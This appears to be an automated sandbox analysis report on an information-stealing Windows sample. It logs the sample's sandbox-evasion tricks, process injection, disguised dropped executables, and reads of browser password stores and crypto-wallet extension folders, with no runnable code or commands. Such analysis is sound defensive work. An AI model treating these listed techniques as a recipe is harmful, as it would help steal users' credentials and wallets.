Source: C:\Users\user\Desktop\file.exe	Memory written: PID: 6460 base: 3030005 value: E9 EB EB A5 72			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: PID: 6460 base: 75A8EBF0 value: E9 1A 14 5A 8D			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: PID: 6460 base: 3040005 value: E9 8B 8A E1 72			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: PID: 6460 base: 75E58A90 value: E9 7A 75 1E 8D			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: PID: 6460 base: 3050005 value: E9 2B 02 E3 72			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: PID: 6460 base: 75E80230 value: E9 DA FD 1C 8D			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe

Stalling execution: Execution stalls by calling Sleep

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00B6E2A2 rdtsc

0_2_00B6E2A2

Source: C:\Users\user\Desktop\file.exe	Window / User API: threadDelayed 8154			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window / User API: threadDelayed 839			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe	Window / User API: threadDelayed 9963			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

Source: C:\Users\user\Desktop\file.exe TID: 1988	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4404	Thread sleep time: -1002000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1988	Thread sleep time: -8154000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4404	Thread sleep time: -2517000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1988	Thread sleep time: -142000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe TID: 2132	Thread sleep count: 9963 > 30			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe TID: 2132	Thread sleep time: -2241675s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe TID: 2132	Thread sleep count: 32 > 30			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009833B0 CreateDirectoryA,FindFirstFileA,		0_2_009833B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009A3880 FindFirstFileA,GetLastError,CreateDirectoryA,		0_2_009A3880
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008F1F8C FindFirstFileExW,GetLastError,		0_2_008F1F8C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008F1FAC FindFirstFileExW,		0_2_008F1FAC

Source: C:\Users\user\Desktop\file.exe

Thread delayed: delay time: 30000

Jump to behavior

Source: 0oMfHkGWFh4pWeb Data.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: file.exe, 00000000.00000002.4444174900.0000000001442000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&0000000
Source: file.exe, 00000000.00000002.4445827728.00000000064E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: 0oMfHkGWFh4pWeb Data.0.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: 0oMfHkGWFh4pWeb Data.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 0oMfHkGWFh4pWeb Data.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 0oMfHkGWFh4pWeb Data.0.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: 0oMfHkGWFh4pWeb Data.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe, 00000000.00000003.2073911947.000000000143F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444174900.0000000001442000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073061724.000000000143B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2074787330.000000000143B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.4445827728.00000000064E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}:
Source: 0oMfHkGWFh4pWeb Data.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 0oMfHkGWFh4pWeb Data.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 0oMfHkGWFh4pWeb Data.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: file.exe, 00000000.00000003.2013029941.0000000001410000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: 0oMfHkGWFh4pWeb Data.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: 0oMfHkGWFh4pWeb Data.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: file.exe, 00000000.00000002.4444174900.0000000001406000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sik&ven_vmware&prod_vidi&1656f219&0&000000#{07f-11d0-94f2-00a0c91e
Source: 0oMfHkGWFh4pWeb Data.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 0oMfHkGWFh4pWeb Data.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 0oMfHkGWFh4pWeb Data.0.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: file.exe, 00000000.00000002.4445435690.0000000006090000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_1985C77F
Source: 0oMfHkGWFh4pWeb Data.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: 0oMfHkGWFh4pWeb Data.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 0oMfHkGWFh4pWeb Data.0.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 0oMfHkGWFh4pWeb Data.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 0oMfHkGWFh4pWeb Data.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: file.exe, 00000000.00000002.4444174900.00000000013A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
Source: file.exe, 00000000.00000003.2013029941.0000000001410000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&
Source: 0oMfHkGWFh4pWeb Data.0.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: 0oMfHkGWFh4pWeb Data.0.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: file.exe, 00000000.00000002.4445771652.0000000006425000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}A;MM;MSXE;L32WIN2.EXE;
Source: 0oMfHkGWFh4pWeb Data.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 0oMfHkGWFh4pWeb Data.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 0oMfHkGWFh4pWeb Data.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 0oMfHkGWFh4pWeb Data.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 0oMfHkGWFh4pWeb Data.0.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 0oMfHkGWFh4pWeb Data.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, 00000000.00000003.3304673570.000000000610E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}!w
Source: 0oMfHkGWFh4pWeb Data.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 0oMfHkGWFh4pWeb Data.0.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: file.exe, 00000000.00000002.4444174900.00000000013FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW:D
Source: 0oMfHkGWFh4pWeb Data.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: 0oMfHkGWFh4pWeb Data.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00B6E2A2 rdtsc

0_2_00B6E2A2

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0098C630 VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,LoadLibraryA,GetProcAddress,WriteProcessMemory,CreateRemoteThread,

0_2_0098C630

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00984130 mov eax, dword ptr fs:[00000030h]

0_2_00984130

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0098C630 VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,LoadLibraryA,GetProcAddress,WriteProcessMemory,CreateRemoteThread,

0_2_0098C630

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\dD08ulq4N33OmW5HQdwT.exe "C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\dD08ulq4N33OmW5HQdwT.exe"			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\JcZ7W4aCxlpc4pOVLwL1.exe "C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\JcZ7W4aCxlpc4pOVLwL1.exe"			Jump to behavior

Language, Device and Operating System Detection

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_008F360D GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

0_2_008F360D

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_06F0C990 SetThreadExecutionState,SetThreadExecutionState,GetVersion,GetCurrentThreadId,GetThreadDesktop,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GdiplusStartup,CreateThread,CloseHandle,

0_2_06F0C990

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Source: Yara match	File source: 11.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.JcZ7W4aCxlpc4pOVLwL1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dD08ulq4N33OmW5HQdwT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE

Source: Yara match	File source: 00000000.00000003.2113636991.00000000062C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4445827728.00000000064CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6460, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\UhOL8vG3NSxPpn1EjM9IIxV.zip, type: DROPPED

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\formhistory.sqlite			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\places.sqlite			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\signons.sqlite			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\logins.json			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\signons.sqlite			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match

File source: Process Memory Space: file.exe PID: 6460, type: MEMORYSTR

Remote Access Functionality

Source: Yara match	File source: 00000000.00000003.2113636991.00000000062C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4445827728.00000000064CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6460, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\UhOL8vG3NSxPpn1EjM9IIxV.zip, type: DROPPED